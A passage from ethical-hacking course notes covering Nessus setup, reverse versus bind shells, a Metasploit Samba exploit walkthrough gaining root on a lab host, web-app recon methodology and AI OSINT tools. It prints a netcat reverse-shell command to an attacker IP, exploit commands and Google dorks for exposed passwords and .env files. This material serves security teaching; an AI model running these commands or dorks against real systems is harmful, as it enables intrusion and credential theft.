Replace xxxx-xxxx-xxxx-xxxx with your new Nessus Professional Key.

Step-5

Start Nessus:
>> systemctl start nessusd

- You can start Nessus Scanner by typing /bin/systemctl start nessusd.service


- Then go to https://kali:8834/ to configure your scanner

100/129
31. EHP Scanning with Nessus Part 2

Scanning with Nessus Part 2

32. EHP Reverse Shells vs Bind Shells

Reverse Shells vs Bind Shells


Reverse Shell

A reverse shell or connect-back is a setup, where the attacker must first start the server on his
machine, while the target machine will have to act as a client that connects to the server served by
the attacker. After the successful connection, the attacker can gain access to the shell of the target
computer.

To launch a Reverse shell, the attacker doesn’t need to know the IP address of the victim to access
the target computer.

Bind Shell

A bind shell is a sort of setup where remote consoles are established with other computers over the
network. In Bind shell, an attacker launches a service on the target computer, to which the attacker

101/129
can connect. In a bind shell, an attacker can connect to the target computer and execute commands
on the target computer. To launch a bind shell, the attacker must have the IP address of the victim to
access the target computer.

https://notes.anggipradana.com/tutorial/bind-vs-reverse-shell-concept
https://learntheshell.com/posts/bind-shells/
https://www.geeksforgeeks.org/difference-between-bind-shell-and-reverse-shell/

Key Takeaways:

• Reverse Shells are generally more stealthy and reliable for bypassing firewalls but require the
attacker to be ready and listening.

• Bind Shells are simpler but expose the target and depend on open inbound traffic, which is often
restricted by firewalls.

Difference Between Reverse Shell and Bind Shell

Aspect Reverse Shell


Definition A Reverse Shell is a type of shell where the targe
machine (victim) initiates a connection back to th
attacker’s machine, granting remote access.
Connection Flow The target machine connects outbound to the
attacker’s machine, which is set to listen for incom
connections.
Firewall Evasion More effective at bypassing firewalls, as firewalls
typically allow outbound traffic (e.g., web traffic)
blocking unsolicited inbound traffic.

102/129
Aspect Reverse Shell
Use Cases Preferred when the attacker is behind a NAT, firew
or on a private network, making direct inbound
connections to the attacker impossible.
Setup The attacker runs a listener on their machine (e.g
-lvp <port>), and the target is instructed to conne
back (e.g., nc <attacker-IP> <port> -e sh).
Target Exposure The target machine’s exposure is minimal as it do
not leave an open port accessible to anyone; the
connection is outbound to a specific attacker.

Network Visibility Reverse Shells often use commonly allowed port


80 (HTTP) or 443 (HTTPS) to blend with normal
outbound traffic, reducing suspicion.
Security Concerns May fail if the target network restricts outbound
connections or applies strict egress filtering.

Examples Reverse Shell Command (on Target):


nc <attacker-IP> <port> -e /bin/bash

33. EHP Staged vs Non-Staged Payloads

Staged vs Non-Staged Payloads


Staged Payloads: A payload that is divided into multiple stages, each serving a specific purpose.

Non-Staged Payloads: A payload that contains everything needed to establish a connection and
gain control, all in one package.

Comparison between Staged and Non-Staged payloads used in penetration testing, especially with
tools like Metasploit:

Aspect Staged Payload


Definition A payload delivered in parts, where an i
(stage 1) fetches a larger one (stage 2).
Delivery Mechanism The first stage connects back to the atta
execute the second stage.
Size Smaller initial payload size since only th
initially.
Network Activity Requires multiple network interactions:
payload, then to fetch the second stage
Stealth Often more stealthy, as the small size o
avoid detection by security tools.
Flexibility More flexible, as the second stage can b
based on the attacker’s requirements.

103/129
Aspect Staged Payload
Reliability Less reliable if the network connection is
second-stage delivery.
Examples - Meterpreter Staged Payload (windows/
reverse_tcp)
- Shell Staged Payload
Resource Efficiency Can be more efficient, especially on con
due to the smaller initial stage.
Use Cases Ideal for advanced attacks requiring flex

Examples in Metasploit

Staged Payload:

Example: windows/meterpreter/reverse_tcp

Process:

1. Sends a small stager to the target.

2. The stager establishes a connection back to the attacker and downloads the larger stage (e.g.,
Meterpreter).

Non-Staged Payload:

Example: windows/meterpreter_reverse_tcp

Process:

The entire payload, including the reverse shell or Meterpreter, is sent at once and executed.

34. EHP Gaining Root with Metasploit

Gaining Root with Metasploit


Step-1

Scan the host first

>> nmap -sV -p 1-1024 192.168.231.152

104/129
In here we will terget the Samba (port: 139,445).

now search for exploit for samba on searchsploit. In here we are working on samba 3.0 and Linux
system (unix)

>> searchsploit samba 3.0 unix

We can also search on Exploit DB (https://www.exploit-db.com/)

105/129
Now go to Metasploit Framework and search for

>> msfconsole

>> search samba 3.0 username

We found a exploit which is ('Username' map script ') for samba 3.0

Now Select it

msf6 > use 0

106/129
Now check options

RHOSTS is not set. Now set it

>> set RHOSTS 192.168.231.152

Now exploit

msf6 exploit(multi/samba/usermap_script) > exploit

Now run some commands to check we are successfully exploit

107/129
We got root access

35. EHP Manual Exploitation

Manual Exploitation

36. EHP Brute Force Attacks

Brute Force Attacks

https://github.com/danielmiessler/SecLists
USER_FILE => /usr/share/seclists/Usernames/

37. EHP Credential Stuffing and Password Spraying

Credential Stuffing and Password Spraying

Week 08

108/129
38. EHP Web Application Testing Methodology

Web Application Testing Methodology


https://medium.com/@zisansakibhaque/web-application-security-testing-method-5ed53ab7f168

Recon

1. Footprinting Website [ Recon with OSINT ]


2. Recon with Browser Addons [ Finding Technology, Service information ]
3. Google Dorking
4. Github Dorking
5. Port Scanning
6. Finding DNS Information
7. Whois Lookup
8. WAF Identification
9. Shodan Dorking

Enumeration

1. Check Security Header Info


2. Subdomain Enumeration
3. Filtering Live Domains
4. URL Extraction
5. Content Discovery
6. Finding Parameters
7. Sorting URLs

Vulnerability Scanning

1. Automation in Vulnerability Scanning


2. Scan Vulnerabilities manually through the testing methods of OWASP Top 10 Vulnerabilities
Category.
3. Analyze Vulnerabilities Database.

Now Let’s Start to find out the Bugs in our Target Website

Step 01 —

Footprinting Website

First of all, we would like to footprint of Target website through some reputed methods and
Techniques !!

1. Finding the Target Website’s IP through Website to IP lookup. [ Recommending https://


www.nslookup.io/ ]

2. Finding out the X-Ray Vision for my Target Website [ Recommending https://web-check.as93.net/ ]

3. Finding the Geographical Location of the Target [ Tools — Google Earth, Google Maps, Wikimapia ]

109/129
4. Gathering information from Financial Services [ Tools — Google Finance, MSN Money, Yahoo!
Finance ]

5. Gathering Information from Business Profile Sites [ Tools — Crunchbase, opencorporates,


corporationwiki ]

6. Monitoring Target using Alerts [ Tools — Google Alerts, Twitter Alerts. Giga Alerts ]

7. Tracking the Online Reputation of the Target [ Tools — Mention, ReviewPush, Reputology ]

8. Gathering Information from Groups, Forums and Blogs

9. Gathering Information from Public Source Code Repositories [ Tools — Recon-ng

10. Footprinting through Social Networking Sites. [ Facebook, Twitter, Linkedin etc ]

11. Collecting Information through Social Engineering [ Collect information about the users and
employees interest , cookies, sensitive information ]

12. Analyze the Directory Structure of the Target Website [ Tools — Httrack ]

13. Find out the Archive and Analyze previous data [ Tools — ViewDns, https://web.archive.org ]

14. Extracting Meta Data of the Public Documents [ Tools — Exitfool, Web Data Extractor, Metagoofil ]

15. Extracting Website Links [ Tools — CeWL ]

16. Email Footprinting [ Tools — Infoga, eMailTracker Pro ]

Step 02 —

Recon with Browser Addons

Now Let’s Recon our Target Website through some Browser Addons !!

1. Finding the Technology which are used to build our Target Website [ Tools — Wappalyzer,
BuiltWith ]

2. Detect the use of JavaScript libraries with known vulnerabilities [ Tools — Retire.js ]

3. Gather Information of Ports, Services and Server and Common Vulnerabilities [ Tools — Shodan ]

4. Test Web Application [ Tools — Knoxx , HackTools ]

Step 03—

Google Dorking

site:target.com -site www.target.com

110/129
Online Resource:

– https://github.com/chr3st5an/Google-Dorking

— https://www.stationx.net/how-to-google-dork-a-specific-website/

Step 04 —

Github Dorking

What we can find on Github?

111/129
• FTP Credentials
• Secret Keys [API_key, Aws_secret key, etc.]
• Internal credentials [Employee credentials]
• API Endpoints
• Domain Patterns

Go to github and search


Eg.

- “target.com” “dev”
- “dev.target.com”
- “target.com” API_key
- “target.com” password
- “api.target.com”

More info about Github dorking : https://infosecwriteups.com/github-dork-553b7b84bcf4

Find more github dorks on:

https://github.com/random-robbie/keywords/blob/master/keywords.txt
https://gist.github.com/jhaddix/77253cea49bf4bd4bfd5d384a37ce7a4

Some awesome write-up about github dork/recon

https://orwaatyat.medium.com/your-full-map-to-github-recon-and-leaks-exposure-860c37ca2c82

https://medium.com/hackernoon/developers-are-unknowingly-posting-their-credentials-online-
caa7626a6f84

https://shahjerry33.medium.com/github-recon-its-really-deep-6553d6dfbb1f

Step 05—
Port Scanning

Now Let’s Scan the Ports of our Target Website through some necessary tools so that we can find out
the way of Attacking !! Haha..

Tools in Scanning Ports —

1. Nmap [ https://www.stationx.net/nmap-cheat-sheet/ ]
2. UnicornScan [ https://0xsp.com/offensive/offensive-cheatsheet/ ]
3. Angry IP Scan [ https://0xsp.com/offensive/offensive-cheatsheet/ ]
4. Netcat [ https://0xsp.com/offensive/offensive-cheatsheet/ ]

Common Ports Cheat Sheet

112/129
Encrypted Ports Peer-to-Peer Ports

22: SSH/SCP 1214: Kazaa

443: HTTP over SSL 4662: eMule

465: SMTP over SSL 6346-6347: Gnutella

563: NNTP over SSL 6881-6889: BitTorrent

636: LDAP over SSL 6699: Napster

989-990: FTP over SSL

993: IMAP over SSL

995: POP3 over SSL

6679: IRC over SSL

Gaming Ports Streaming Ports

2302-2305: Halo 554: RTSP

3074: Xbox Live 1755: Microsoft Media Server

3724: World of Warcraft 7070: RealAudio

6112: Battle.net 8000: Internet Radio

6500: Gamespy Arcade 8080: HTTP Proxy (often used for stream

27015: Half-Life

28960: Call of Duty

Malicious Ports General Services

1080: MyDoom 20-21: FTP

3127: MyDoom 23: Telnet

4444: Sasser 25: SMTP

8866: Bagle.B 53: DNS

9898: Dabber 80: HTTP

9988: Rbot/Spybot 110: POP3

12345: NetBus 143: IMAP

27374: Sub7 161-162: SNMP

31337: Back Orifice 389: LDAP

113/129
Step 06 —
Finding DNS Information

Tools in finding DNS Information —

1. Dig [ https://sid4hack.medium.com/decoding-dns-penetration-testers-journey-with-
dig-7cb9845e6215 ]
2. DNS Lookup
3. MxToolbox
4. Nslookup
5. Viewdns

DNS footprinting helps in determining the following records about the target
DNS

Record Type Description


A Points to a host’s IP address
MX Points to domain’s mail server
NS Points to host’s name server
CNAME Canonical naming allows aliases to a ho
SOA Indicates authority for a domain
SRV Service records
PTR Maps IP address to a hostname
RP Responsible person
HINFO Host information record includes CPU ty
TXT Unstructured text records

Step 07 —
Whois Lookup

Find out the Domain’s Information by using Whois Lookup. Link — https://www.whois.com/whois/

Step 08—
WAF Identification

In this case we need to identify our Target website is WAF Protected or Not. That’s why can use 2
different tools to complete the same task.

Wafw00f [ https://github.com/EnableSecurity/wafw00f ]
WhatWaf [ https://github.com/Ekultek/WhatWaf ]

Step 09 —
Shodan Dorking

Shodan is a search engine for Internet-connected devices. It is different from search engines like

114/129
Google and Bing because Google and Bing are great for finding websites but Shodan helps in finding
different things like popular versions of Microsoft IIS, control servers for Malware, how many host are
affected with the new CVEs, which countries are becoming more connected, SSL certificates of the
websites etc.

How to use CLI Based version (Basics) ?

I would like to suggest — Follow this Tutorial https://youtu.be/v2EdwgX72PQ?si=BedrWedKxxuy3cSk

Step 10 —
Check Security Header Info

HTTP Security Response Headers Cheat Sheet — https://cheatsheetseries.owasp.org/cheatsheets/


HTTP_Headers_Cheat_Sheet.html

Step 11 —
Subdomain Enumeration

Let’s discuss the top 10 subdomain search tools that can help you discover subdomains.

1. Sublist3r [ Python tool that leverages multiple search engines to enumerate subdomains for a
given domain. ]

2. Amass [ Open-source tool for passive reconnaissance that discovers subdomains, IP addresses,
and other related information. ]

3. Subfinder [ Subdomain discovery tool that uses multiple sources, including search engines and
certificate transparency logs. ]

4. Censys [ A search engine that provides access to a large and up-to-date database of internet
hosts, including subdomains. ]

5. Assetnote [ A tool for asset discovery and monitoring, helping with subdomain identification and
tracking changes over time. ]

6. Findomain [ Cross-platform subdomain enumerator that uses various sources to identify


subdomains. ]

7. SecurityTrails [ Offers a comprehensive DNS database to discover subdomains, IP histories, and


other related information. ]

8. Knockpy [ Python tool that uses multiple sources to gather subdomain information for a target
domain. ]

9. DNSDumpster [ An online tool that provides DNS reconnaissance services, including subdomain
discovery. ]

10. Aquatone [ A tool that helps visualize and gather information about domains, including
subdomains, by combining techniques like screenshotting. ]

115/129
Step 12—
Filtering Live Domains

There is a tool called HTTPX, which is used to check Subdomains are Active or Not and there are
multiple methods to use this tool. We will see the simple method only.

▶ Enumerate/Collect all subdomains using tools like subfinder, assetfinder, Knockpy and haktrails,
etc.

subfinder (https://www.youtube.com/watch?v=UT52zmdTMw0)

assetfinder (https://www.youtube.com/watch?v=YJ-nv758OSQ)

Knockpy (https://www.youtube.com/watch?v=FKhfZaYVO9I)

haktrails (https://www.youtube.com/watch?v=UT72WuKEQKM)

Run : subfinder -d someweb.com -o subf.txt -v

Run : echo “someweb.com” | haktrails subdomains > haksubs.txt

Run : assetfinder -subs-only someweb.com > asset.txt

▶ Add all Enumerated/Collected subdomains from different tools in different files into one file with
unique subdomains, that may be subdomains.txt

Run : cat subf.txt haksubs.txt asset.txt | sort -u > subdomains.txt

▶ Now, will check the identified subdomains are active or not -

Run : httpx -l subdomains.txt -o activesubs.txt -threads 200 -status-code -follow-redirects

▶ You’ll able to see the active subdomains only, on which you can start finding bugs and all.

***Another Tools is Reconftw

Step 13—
URL Extraction

Here are some useful tools to perform this method —

Httpx
WaybackURLs

Step 14—
Content Discovery

Here are some useful tools to perform this method —

116/129
Httpx
Gobuster
Dirbuster

Step 15—
Finding Parameters

We are going to enumerate a web application to find out hidden parameters of the Target website,

Here are some useful tools to perform this method —

Arjun Tool
ParamSpider
WaybackURL

Step 16—
Sorting URLs

GF tool is a powerful command-line utility that acts as a wrapper around the grep command,
providing additional functionality and convenience for searching and filtering text.

Link — https://github.com/tomnomnom/gf

Step 17—
Automation in Vulnerability Scanning

1. Nessus — Nessus is a remote security scanning tool, which scans a computer and raises an alert
if it discovers any vulnerabilities that malicious hackers could use to gain access to any computer
you have connected to a network.

Using Process — https://youtu.be/Gy-aPBb0djk?si=OsjRy9uiPXt_oTT6

2. Burpsuite — Burp Suite is an integrated platform/graphical tool for performing security testing of
web applications. Its various tools work seamlessly together to support the entire testing process,
from initial mapping and analysis of an application’s attack surface, through to finding and exploiting
security vulnerabilities.

Using Process — https://www.youtube.com/watch?v=hY_gzrTMn3U&list=PLwO5-


rumi8A7TVRzfOD4OHabwJ0v1ZA81

3. ZAP — OWASP ZAP is a penetration testing tool that helps developers and security professionals
detect and find vulnerabilities in web applications.

Using Process — https://www.youtube.com/watch?v=bf2YuqgaeWo&list=PLH8n_ayg-60J9i3nsLybper-


DR3zJw6Z5

4. Acunetix — Acunetix is an automated web application security testing tool that audits your web
applications by checking for vulnerabilities like SQL Injection, Cross-site scripting, and other
exploitable vulnerabilities.

117/129
Using Process — https://darkyolks.medium.com/vulnweb-lab-report-an-analysis-of-vulnerabilities-
on-the-web-c33472761913

5. SQLmap — SQLMAP is an open-source penetration tool. SQLMAP allows you to automate the
process of identifying and then exploiting SQL injection flaws and subsequently taking control of the
database servers. In addition, SQLMAP comes with a detection engine that includes advanced
features to support penetration testing.

Using Process — https://www.youtube.com/watch?


v=nVj8MUKkzQk&list=PL_jb7LxOF7HVvkuovEnszsWayU_-NOtxx

6. WPScan — WPScan is an open-source WordPress security scanner. It is used to scan WordPress


websites for known vulnerabilities within the WordPress core and WordPress plugins and themes. It
also checks for weak passwords, exposed files, and much more. Since it is a WordPress black box
scanner, it mimics an actual attacker

Using Process — https://youtu.be/zmK_hg6hIM0?si=jU9GSnO6vl8hnmSN

Step 18 —
Scan Vulnerabilities manually through the testing methods of OWASP Top
10 Vulnerabilities Category.

First of all let’s talk about the Category and Sub categories of the OWASP Top 10 Vulnerabilities
because if you know what are the bugs, then you can exploit those through your own methodologies
of Testing.

OWASP Top 10 2021 — Bug Name Examples by Category:

A01: Broken Access Control

• IDOR
• Directory or Path Traversal
• Function Injection
• Privilege Escalation
• Horizontal and Vertical Privilege Escalation

A02: Cryptographic Failures

• Cleartext Transmission of Sensitive Data


• Insufficient Entropy
• Insecure Random Number Generation
• Padding Oracle Attack
• Use of Weak Ciphers
• Weak or Misconfigured Cryptographic Configurations

A03: Injection

• Os Command Injection
• SQL Injection
• Cross-Site Scripting (XSS)
• Expression Language Injection

118/129
• XML Injection
• LDAP Injection
• NoSQL Injection
• SSTI

A04: Insecure Design

• Security-by-Obscurity
• Session Fixation
• Unintended Functionality
• Use of Hardcoded Credentials
• Weak Error Handling

A05: Security Misconfiguration

• Default Accounts and Passwords


• Default or Weak Configuration Settings
• Disabled Security Features
• Improperly Configured Permissions and Access Controls (Insecure Permissions)
• Unnecessary Features or Services Enabled
• Use of Vulnerable Software
• Directory Listing Enabled
• Insecure Default Passwords or Credentials
• Improperly Configured Cross-Origin Resource Sharing (CORS)

A06: Vulnerable and Outdated Components

• Use of Known Vulnerable Components


• Outdated Libraries and Frameworks
• Third-Party Components with Unpatched Vulnerabilities
• Lack of Patching and Updates

A07: Identification and Authentication Failures

• Brute-Force Attacks
• Credential Stuffing
• Credential Theft
• Session Hijacking
• Weak Password Policies
• Weak Session Cookies
• Lack of Multi-Factor Authentication (MFA)
• Insecure Session Management
• Insecure Authentication Protocols
• Insecure Password Storage
• User Enumeration

A08: Software and Data Integrity Failures

• Insecure Direct Object References (IDOR)


• Server-Side Request Forgery (SSRF)
• SQL Injection and NoSQL Injection Variants
• Tampering with Updates

119/129
• Unvalidated Redirects and Forwards

A09: Security Logging and Monitoring Failures

• Lack of Audit Logging


• Insufficient Log Data
• Unmonitored Logs
• Unsecured Logs

A10: Server-Side Request Forgery (SSRF)

• Unauthenticated SSRF
• Authenticated SSRF

Now you can test your Target website with several techniques to find out the vulnerabilities.
Recommending to follow the related writeups of the vulnerability.

Step 19—
Analyze Vulnerabilities Database.

Recommending some resources —

1. Exploit Database — https://www.exploit-db.com/

2. Vulnerability Database — https://vuldb.com/

3. CVE Security Vulnerability — https://www.cvedetails.com/

4. Patchstack — https://patchstack.com/database/

Step 20—
Report Writing

Report Structure:
A security testing report should have a clear and logical structure. Here’s a recommended structure:

a. Introduction: Provide a brief overview of the security testing context, objectives, and report
scope.

b. Methodology: Describe the techniques and tools used to conduct the security testing.

c. Findings: Present the identified vulnerabilities in a clear and organized manner. Use categories
or severity levels to aid readability.

d. Evidence: Include screenshots, code snippets, or any other evidence to support your findings.

e. Recommendations: Propose specific corrective measures for each identified vulnerability.

f. Conclusion: Summarize the key points of the report and express gratitude to relevant parties.
120/129
Recommending to Follow this way too — https://www.intigriti.com/hackademy/how-to-write-a-good-
report

39. EHP Bug Hunting with Manual Testing

Bug Hunting with Manual Testing

Bug Hunting Manual

https://medium.com/@zisansakibhaque/web-application-security-testing-method-5ed53ab7f168

Step-10

Clickjacking

HTTP Security Response Headers Cheat Sheet

HTTP Headers are a great booster for web security with easy implementation. Proper HTTP response
headers can help prevent security vulnerabilities like Cross-Site Scripting, Clickjacking, Information
disclosure and more.

http header/ security header owasp (blog)

https://cheatsheetseries.owasp.org/cheatsheets/HTTP_Headers_Cheat_Sheet.html

For test perpous find programs from the listed sites below.

Bug bounty platforms

1. HackerOne
https://hackerone.com/bug-bounty-programs

2. Bugcrowd
https://bugcrowd.com/engagements?
category=bug_bounty&page=1&sort_by=promoted&sort_direction=desc

Public Bug Bounty Program List


https://www.bugcrowd.com/bug-bounty-list/

121/129
3. Bugbase
https://bugbase.ai/programs

4. Intigriti
https://www.intigriti.com/researchers/bug-bounty-programs

5. EC-council Bug Bounty Program


https://www.eccouncil.org/bug-bounty/

To check security header info we can use some websites from search engines.

1. https://securityheaders.com/
2. https://developer.mozilla.org/en-US/observatory
3. https://www.serpworx.com/check-security-headers/
4. https://domsignal.com/secure-header-test

Main focus of bug bounty program to show the vulnerability impact

Manual test for click jack

ClickJack script

<html>
<head>
<title>Clickjack test page</title>
</head>
<body>
<iframe src="https://example.com" width="500" height="500"></iframe>
</body>
</html>

Note: create clickjacking script with ai upcoming class

Never submit automation report

1. False Positive

Definition: A vulnerability is incorrectly flagged as present, but it does not actually exist.

Example: An automated security tool mistakenly identifies a harmless code snippet as a SQL
Injection vulnerability.

Implications: Leads to wasted time investigating non-existent issues, which can slow down the
vulnerability assessment process.

Key Takeaway: Ensure thorough manual validation to avoid acting on false alarms.

2. True Positive

122/129
Definition: A vulnerability is correctly identified as present.

Types:

• Automatically Corrected: The system detects and resolves the issue without human
intervention.

• Manually Corrected: The system flags the issue, and a security analyst confirms and remediates
it.

Example: A scanner identifies and patches a known outdated dependency (automatic) or flags an
XSS vulnerability that a developer confirms and fixes (manual).

Implications: Shows the system is effective in detecting actual vulnerabilities, but manual review
may still be required for thoroughness.

Key Takeaway: Balance between automation and manual validation improves overall accuracy and
resolution.

3. False Negative

Definition: A vulnerability is present but is not detected by the system.

Example: An automated tool fails to identify an insecure API endpoint vulnerable to unauthorized
access.

Implications: These are the most dangerous as they provide a false sense of security, leaving
systems exposed.

Key Takeaway: Regularly update tools and perform manual penetration testing to uncover missed
vulnerabilities.

4. True Negative

Definition: No vulnerability is present, and the system correctly identifies that no issue exists.

Example: A secure web application undergoes scanning, and the tool accurately reports no
vulnerabilities.

Implications: Confirms the accuracy of the tool, minimizing unnecessary alerts and providing
confidence in the system's security.

Key Takeaway: Strive for a high true negative rate to reduce false alarms and improve operational
efficiency.

123/129
40. EHP Do’s and Don’ts in Bug Report writing

Do’s and Don’ts in Bug Report Writing

41. EHP Ethical Hacking with AI – Part 01

Ethical Hacking with AI – Part 01

1. Pentest GPT ( https://pentestgpt.ai/ ) ( https://github.com/GreyDGL/PentestGPT )


2. Payload All the things ( https://github.com/swisskyrepo/PayloadsAllTheThings )
3. Pentest GPT Plugin

42. EHP Ethical Hacking with AI – Part 02

Ethical Hacking with AI – Part 02

Cylect (AI OSINT Tool)


https://cylect.io/

Cylect is an advanced OSINT (Open-Source Intelligence) tool that leverages AI to streamline the
process of gathering publicly available information. Its primary purpose is to assist cybersecurity
professionals, investigators, and researchers in acquiring actionable intelligence from diverse
sources. Below are some key features and functionalities you might expect from a tool like Cylect:

Key Features:

Automated Data Collection:

• Extracts information from websites, social media platforms, and public databases.
• Scrapes data from various forums, blogs, and news outlets.

AI-Powered Analysis:

• Uses machine learning to identify patterns, trends, and anomalies in collected data.
• Offers sentiment analysis for social media content and articles.

Multi-Layered Search:

• Supports deep web and dark web exploration using anonymizing networks like Tor.
• Advanced search capabilities to refine and filter data effectively.

124/129
Data Visualization:

• Presents information in charts, graphs, and networks for better understanding.


• Generates heatmaps to locate geographical data trends.

Integration and Extensibility:

• Compatible with third-party APIs (e.g., Shodan, VirusTotal).


• Customizable modules to suit specific OSINT requirements.

Real-Time Monitoring:

• Tracks specific keywords or entities across multiple platforms.


• Sends alerts for new findings or critical changes.

Compliance and Privacy:

• Includes features to ensure ethical usage and compliance with legal standards.

Report Generation:

• Provides detailed and shareable reports in various formats (PDF, JSON, etc.).
• Includes actionable insights for decision-making.

Applications:

Cybersecurity: Identifying vulnerabilities and potential threats.

Investigations: Gathering evidence for legal or personal cases.

Brand Protection: Monitoring reputation and intellectual property violations.

Threat Intelligence: Tracking malicious activities and actors.

Some other similar tools

1. Maltego: A comprehensive link analysis tool that can be enhanced with AI modules for advanced
entity analysis.

Website: https://www.maltego.com

2. Social-Searcher: Incorporates basic AI for sentiment and trend analysis on social media.

Website: https://www.social-searcher.com

3. Twint: An advanced Twitter scraping & OSINT tool written in Python that doesn't use Twitter's API,
allowing you to scrape a user's followers, following, Tweets and more while evading most API
limitations.

Website: https://github.com/twintproject/twint

4. Amass: In-depth attack surface mapping and asset discovery


125/129
Website: https://github.com/owasp-amass/amass

5. FOCA: Tool to find metadata and hidden information in the documents.

Website: https://github.com/ElevenPaths/FOCA

Traditional OSINT Tools (Non-AI or Minimal AI Features):

theHarvester

Primarily relies on rule-based techniques to collect data.

Recon-ng

Modular but not inherently AI-driven.

SpiderFoot

Focuses on automating OSINT tasks without much AI involvement.

Shodan

Offers basic data aggregation but doesn’t heavily rely on AI.

Censys

Provides search functionality without AI-driven analysis.

43. EHP Ethical Hacking with AI – Part 03

Ethical Hacking with AI – Part 03


Dorkgpt Linked class 21

DorkGPT

Site: https://www.dorkgpt.com/

Google Dorking (or Google hacking) is a method of using advanced search operators in Google to
uncover sensitive information, vulnerabilities, or flaws in websites and web applications. These
operators can help find misconfigurations, exposed databases, administrative panels, and other
sensitive data that shouldn't be publicly accessible.

Here are some examples of Google Dorks that can be used to discover potential vulnerabilities in
web applications. Remember, using these techniques for illegal purposes is unethical and often
illegal, so ensure your actions are ethical and within legal boundaries (e.g., authorized penetration
testing or vulnerability scanning).

126/129
Examples

# 1. Find exposed login pages:


inurl:"login" intitle:"login"

# 2. Discover exposed administrative panels:


inurl:"admin" intitle:"admin"

# 3. Search for exposed configuration files:


inurl:"config" filetype:txt

# 4. Search for publicly exposed databases (MySQL, MongoDB, etc.):


filetype:sql "password"
filetype:sql "database"

# 5. Find exposed .git directories (Git repositories):


intitle:"index of" .git

# 6. Find unsecured or publicly exposed backup files:


filetype:bak "password"

# 7. Search for publicly exposed PHP error messages (may contain vulnerabilities):
inurl:"error_log" filetype:log

# 8. Find exposed sensitive files (like usernames and passwords in text files):
filetype:txt "username" "password"

# 9. Look for open directories (could contain sensitive files):


intitle:"index of" "admin"

# 10. Discover publicly exposed WordPress admin panels:


inurl:"wp-login.php"

# 11. Look for unsecured login forms with POST methods:


inurl:"login" method="post"

# 12. Find publicly exposed .env configuration files (often used for environment variables):
filetype:env

# 13. Find exposed login or authentication forms for WordPress:


inurl:"wp-login.php"

# 14. Search for public PDFs containing sensitive information:


filetype:pdf "password"

# 15. Look for error pages that may provide server details or vulnerabilities:
inurl:"404" intitle:"Not Found"

Extra Links:

Generate Dork
https://www.yeschat.ai/gpts-9t557DT1RUP-GrokGPT

127/129
All GPTs at Instant Access!
Discover and free to try over 10,000 top GPTs directly without ChatGPT Plus

https://www.yeschat.ai/

44. EHP Ethical Hacking with AI – Part 04

Ethical Hacking with AI – Part 04


TARANIS_AI (OSINT Tool)

Taranis AI is an advanced Open-Source Intelligence (OSINT) tool, leveraging Artificial Intelligence to


revolutionize information gathering and situational analysis

Link:
https://taranis.ai/

Note: Docker install must to run taranis ai

To install docker on kali

https://www.kali.org/docs/containers/installing-docker-on-kali/

>> sudo apt update

>> sudo apt install -y docker.io

>> sudo systemctl enable docker --now

>> docker

Manual Installation of Docker Compose Plugin: If the above steps do not resolve the issue, you can
manually install the Docker Compose plugin:

>> DOCKER_CONFIG=${DOCKER_CONFIG:-$HOME/.docker}
mkdir -p $DOCKER_CONFIG/cli-plugins
curl -SL https://github.com/docker/compose/releases/download/v2.12.2/docker-compose-linux-
x86_64 -o $DOCKER_CONFIG/cli-plugins/docker-compose

Set Executable Permissions: Apply executable permissions to the binary:


>> chmod +x $DOCKER_CONFIG/cli-plugins/docker-compose

Verify Installation: Check the version of Docker Compose to verify the installation:
>> docker compose version

128/129
Now Install TARANIS_AI

https://taranis.ai/docs/getting-started/deployment/

Deployment
How to deploy Taranis AI
Clone via git

>> git clone --depth 1 https://github.com/taranis-ai/taranis-ai


>> cd taranis-ai/docker/

Configuration
Copy env.sample to .env

>> cp env.sample .env

Startup & Usage


